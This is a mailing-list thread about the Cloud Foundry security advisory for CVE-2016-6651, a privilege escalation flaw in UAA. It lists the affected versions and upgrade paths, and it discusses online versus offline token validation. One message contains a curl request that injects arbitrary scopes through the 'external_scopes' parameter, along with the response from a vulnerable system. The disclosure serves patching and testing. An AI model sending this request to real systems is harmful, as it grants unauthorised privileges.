Re: [HIGH] CVE-2016-6651: Privilege Escalation in UAA

Timothy Hausler


CC uses offline validation so that it does not have to talk to the UAA for
every request. Right now there is no way to configure CC to use online


On Mon, Sep 26, 2016 at 12:17 PM, Mike Youngstrom <youngm(a)> wrote:

Anyone know off hand if CC uses online or offline validation? If
configurable what config would we look for to know if it is online or


On Mon, Sep 26, 2016 at 12:58 PM, Molly Crowther <
mcrowther(a)> wrote:

Hello all,

In the interest of full public disclosure, the CFF Security Team would
also like to share some additional information about this vulnerability
that will aid in testing and remediation. Please let us know if you have
any questions or concerns.

Molly Crowther
Cloud Foundry Foundation Security Team
Description of Vulnerability

The vulnerability exposes an untested parameter that lets any application
add arbitrary scopes (permissions) to an access token.

<> \

-H"Accept: Application/json" \

-u "cf:" \

-d "username=<username here>" \

-d "password=<password here>" \

-d "client_id=cf" \

-d "grant_type=password" \

-d "response_type=token" \

-d "external_scopes=cloud_controller.test"

A vulnerable system will return the following response:


"access_token": "redacted for readability",

"expires_in": 599,

"jti": "redacted for readability",

"refresh_token": "redacted for readability",

"scope": "openid … cloud_controller.test",

"token_type": "bearer"


cloud_controller.test is an arbitrary string, but may as well be

Applications that perform off-line validation will happily accept the
inserted string as a permission. Applications that use online validations,
i.e. the use of the /check_token UAA API endpoint, are not vulnerable - the
UAA validates the permissions against what’s in the database (uaadb).

A patched system will ignore the external_scopes parameter completely,
and cloud_controller.test will not be returned in the response.

On Mon, Sep 26, 2016 at 11:23 AM, Molly Crowther <
mcrowther(a)> wrote:

CVE-2016-6651: Privilege Escalation in UAA


Cloud Foundry Foundation
Versions Affected


Cloud Foundry release v242 and earlier versions

UAA release v3.7.0 & earlier versions

UAA bosh release (uaa-release) v16 & earlier versions


A privilege escalation vulnerability has been identified with the
/oauth/token endpoint in UAA allowing users to elevate the privileges in
the token issued.

OSS users are strongly encouraged to follow one of the mitigations below:


Upgrade to Cloud Foundry v243 [1] or later

For standalone UAA users

For users using UAA Version 3.0.0 - 3.7.0, please upgrade to UAA
Release to v3.7.3[2], v3.4.5[3] or v3.3.0.6[4]

For users using standalone UAA Version 2.X.X, please upgrade to
UAA Release to v2.7.4.8 [5]

For users using UAA bosh release, please upgrade to UAA-Release
v17 [6] if upgrading to v3.7.3 [2] ,v12.6 [7] if upgrading to v3.4.5[3] or
v11.7 [8] if upgrading to v3.3.0.6[4]


SAP HCP Security Team










History2016-09-26: Initial vulnerability report published

Join to automatically receive all group messages.